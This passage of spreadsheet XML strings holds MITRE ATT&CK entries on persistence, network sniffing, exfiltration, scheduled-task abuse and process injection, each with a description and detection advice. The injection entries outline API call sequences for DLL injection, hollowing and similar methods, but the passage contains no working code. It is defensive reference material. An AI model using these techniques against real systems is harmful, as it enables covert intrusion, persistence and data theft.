    <t xml:space="preserve">Monitor for unexpected changes to RC scripts in the &lt;code&gt;/etc/&lt;/code&gt; directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.
Monitor for &lt;code&gt;/etc/rc.local&lt;/code&gt; file creation. Although types of RC scripts vary for each Unix-like distribution, several execute &lt;code&gt;/etc/rc.local&lt;/code&gt; if present. </t>
  </si>
  <si>
    <t>root</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Startup Items</t>
  </si>
  <si>
    <t>Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)
This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, &lt;code&gt;/Library/StartupItems&lt;/code&gt; isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), &lt;code&gt;StartupParameters.plist&lt;/code&gt;, reside in the top-level directory. 
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/005</t>
  </si>
  <si>
    <t>The &lt;code&gt;/Library/StartupItems&lt;/code&gt; folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.
Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.</t>
  </si>
  <si>
    <t>Administrator</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1039</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</si>
  <si>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</si>
  <si>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Privileges to access network shared drive</t>
  </si>
  <si>
    <t>Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1040</t>
  </si>
  <si>
    <t>02 April 2021</t>
  </si>
  <si>
    <t>Credential Access, Discovery</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</si>
  <si>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t>
  </si>
  <si>
    <t>Network interface access and packet capture driver</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1041</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. 
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1046</t>
  </si>
  <si>
    <t>09 April 2021</t>
  </si>
  <si>
    <t>2.2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</si>
  <si>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</si>
  <si>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Containers, IaaS, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Praetorian</t>
  </si>
  <si>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 (Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI) (Citation: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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1047</t>
  </si>
  <si>
    <t>Execution</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</si>
  <si>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</si>
  <si>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@ionstorm</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048</t>
  </si>
  <si>
    <t>Alfredo Abarca; William Cain</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. 
Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/001</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</si>
  <si>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Artifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. </t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. 
Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/002</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</si>
  <si>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</si>
  <si>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Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">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This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/003</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1049</t>
  </si>
  <si>
    <t>08 March 2021</t>
  </si>
  <si>
    <t>IaaS, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1052</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media are mounted.</t>
  </si>
  <si>
    <t>Presence of physical medium or device</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium: Exfiltration over USB</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1052/001</t>
  </si>
  <si>
    <t>11 March 2020</t>
  </si>
  <si>
    <t>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Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053</t>
  </si>
  <si>
    <t>Execution, Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>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</si>
  <si>
    <t>Alain Homewood, Insomnia Security; Leo Loobeek, @leoloobeek; Prashant Verma, Paladion; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Administrator, SYSTEM, User</t>
  </si>
  <si>
    <t>Scheduled Task/Job: At (Linux)</t>
  </si>
  <si>
    <t>Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)
An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.
Adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via &lt;code&gt;sudo&lt;/code&gt;.(Citation: GTFObins at)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/001</t>
  </si>
  <si>
    <t>03 December 2019</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Scheduled Task/Job: At (Windows)</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;at.exe&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. 
An adversary may use &lt;code&gt;at.exe&lt;/code&gt; in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).
Note: The &lt;code&gt;at.exe&lt;/code&gt; command line utility has been deprecated in current versions of Windows in favor of &lt;code&gt;schtasks&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/002</t>
  </si>
  <si>
    <t>27 November 2019</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</si>
  <si>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t>
  </si>
  <si>
    <t>Scheduled Task/Job: Cron</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse the &lt;code&gt;cron&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The &lt;code&gt;cron&lt;/code&gt; utility is a time-based job scheduler for Unix-like operating systems.  The &lt;code&gt; crontab&lt;/code&gt; file contains the schedule of cron entries to be run and the specified times for execution. Any &lt;code&gt;crontab&lt;/code&gt; files are stored in operating system-specific file paths.
An adversary may use &lt;code&gt;cron&lt;/code&gt; in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/003</t>
  </si>
  <si>
    <t>23 August 2021</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.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 learning details about the environment through Discovery, and Lateral Movement. </t>
  </si>
  <si>
    <t>User</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Scheduled Task</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The &lt;code&gt;schtasks&lt;/code&gt; can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though &lt;code&gt;at.exe&lt;/code&gt; can not access tasks created with &lt;code&gt;schtasks&lt;/code&gt; or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/005</t>
  </si>
  <si>
    <t>30 December 2020</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</si>
  <si>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</si>
  <si>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Scheduled Task/Job: Systemd Timers</t>
  </si>
  <si>
    <t>Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension &lt;code&gt;.timer&lt;/code&gt; that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the &lt;code&gt;systemctl&lt;/code&gt; command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
Each &lt;code&gt;.timer&lt;/code&gt; file must have a corresponding &lt;code&gt;.service&lt;/code&gt; file with the same name, e.g., &lt;code&gt;example.timer&lt;/code&gt; and &lt;code&gt;example.service&lt;/code&gt;. &lt;code&gt;.service&lt;/code&gt; files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to &lt;code&gt;/etc/systemd/system/&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; while user level are written to &lt;code&gt;~/.config/systemd/user/&lt;/code&gt;.
An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/006</t>
  </si>
  <si>
    <t>12 October 2020</t>
  </si>
  <si>
    <t>27 July 2021</t>
  </si>
  <si>
    <t>Systemd timer unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: &lt;code&gt;systemctl list-timers –all&lt;/code&gt;. Analyze the contents of corresponding &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)</t>
  </si>
  <si>
    <t>SarathKumar Rajendran, Trimble Inc</t>
  </si>
  <si>
    <t>User, root</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Container Orchestration Job</t>
  </si>
  <si>
    <t>Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/007</t>
  </si>
  <si>
    <t>29 March 2021</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. </t>
  </si>
  <si>
    <t>Containers</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</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</si>
  <si>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There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. 
More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055</t>
  </si>
  <si>
    <t>Defense Evasion, Privilege Escalation</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</si>
  <si>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</si>
  <si>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Anastasios Pingios; Christiaan Beek, @ChristiaanBeek; Ryan Becwar</t>
  </si>
  <si>
    <t>Anti-virus, Application control</t>
  </si>
  <si>
    <t>Process Injection: Dynamic-link Library Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  
DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; (which calls the &lt;code&gt;LoadLibrary&lt;/code&gt; API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) 
Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of &lt;code&gt;LoadLibrary&lt;/code&gt;).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/001</t>
  </si>
  <si>
    <t>14 January 2020</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</si>
  <si>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</si>
  <si>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Process Injection: Portable Executable Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. 
PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/002</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</si>
  <si>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</si>
  <si>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Process Injection: Thread Execution Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. 
Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point the process can be suspended then written to, realigned to the injected code, and resumed via &lt;code&gt;SuspendThread &lt;/code&gt;, &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Elastic Process Injection July 2017)
This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/003</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</si>
  <si>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</si>
  <si>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Process Injection: Asynchronous Procedure Call</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. 
APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point &lt;code&gt;QueueUserAPC&lt;/code&gt; can be used to invoke a function (such as &lt;code&gt;LoadLibrayA&lt;/code&gt; pointing to a malicious DLL). 
A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/004</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</si>
  <si>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Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Process Injection: Thread Local Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. 
TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/005</t>
  </si>
  <si>
    <t>Process Injection: Ptrace System Calls</t>
  </si>
  <si>
    <t xml:space="preserve">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(ex: &lt;code&gt;malloc&lt;/code&gt;) then invoking that memory with &lt;code&gt;PTRACE_SETREGS&lt;/code&gt; to set the register containing the next instruction to execute. Ptrace system call injection can also be done with &lt;code&gt;PTRACE_POKETEXT&lt;/code&gt;/&lt;code&gt;PTRACE_POKEDATA&lt;/code&gt;, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) 
Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: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 </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/008</t>
  </si>
  <si>
    <t xml:space="preserve">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Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Process Injection: Proc Memory</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. 
Proc memory injection involves enumerating the memory of a process via the /proc filesystem (&lt;code&gt;/proc/[pid]&lt;/code&gt;) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within &lt;code&gt;/proc/[pid]/maps&lt;/code&gt; can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) 
Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/009</t>
  </si>
  <si>
    <t xml:space="preserve">File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Process Injection: Extra Window Memory Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. 
Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)
Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.
Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as &lt;code&gt;WriteProcessMemory&lt;/code&gt; and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.  (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/011</t>
  </si>
  <si>
    <t>10 November 2020</t>
  </si>
  <si>
    <t>Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>Process Injection: Process Hollowing</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  
Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as &lt;code&gt;CreateProcess&lt;/code&gt;, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as &lt;code&gt;ZwUnmapViewOfSection&lt;/code&gt; or &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;  before being written to, realigned to the injected code, and resumed via &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)
This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/012</t>
  </si>
  <si>
    <t>Process Injection: Process Doppelgänging</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. 
Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)
Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)
